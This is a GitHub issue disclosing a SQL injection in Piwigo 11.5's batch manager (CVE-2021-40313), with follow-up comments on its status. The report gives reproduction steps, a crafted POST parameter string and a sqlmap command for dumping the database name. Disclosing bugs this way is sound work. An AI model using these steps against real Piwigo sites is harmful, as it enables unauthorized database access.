Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[11.5]SQL injection #1469

Closed
Y4tacker opened this issue Aug 29, 2021 · 3 comments
Closed

[11.5]SQL injection #1469

Y4tacker opened this issue Aug 29, 2021 · 3 comments

Comments

@Y4tacker
Copy link

Y4tacker commented Aug 29, 2021

I find that there is a sqli in piwigo,here are my descriptions;
At first we need to login and then we can Visit the website http://your-url/admin.php
then we need a Key Parameters called pwg_token,there are many ways to get a token
i visit http://your-url/admin.php?page=user_list
image
then i got pwg_token=3c28c3bf6adc56b0695cf64073605f9b
The point of vulnerability is in admin/batch_manager_global.php;The parameter selection is not filtered
image
Unfiltered parametersselection is spliced
image
The next step is to capture packets using BurpSuite by simply constructing parameters
selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79
Remember to replace the value of the token above
image
Save parameters to file,then just use sqlmap to exploit
python sqlmap.py -r 1233 --current-db
image

@fgeek
Copy link

fgeek commented Dec 7, 2021

@Stakcery why was this closed? Someone has requested CVE identifier for this vulnerability. Please see: https://nvd.nist.gov/vuln/detail/CVE-2021-40313

@plegall is this valid and needs to be fixed?

@Y4tacker
Copy link
Author

Y4tacker commented Dec 7, 2021

I submitted this earlier and clicked close by the way

@ajakk
Copy link

ajakk commented Dec 8, 2021

I submitted this earlier and clicked close by the way

So, is this fixed? If so, what is the fixed version/commit?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants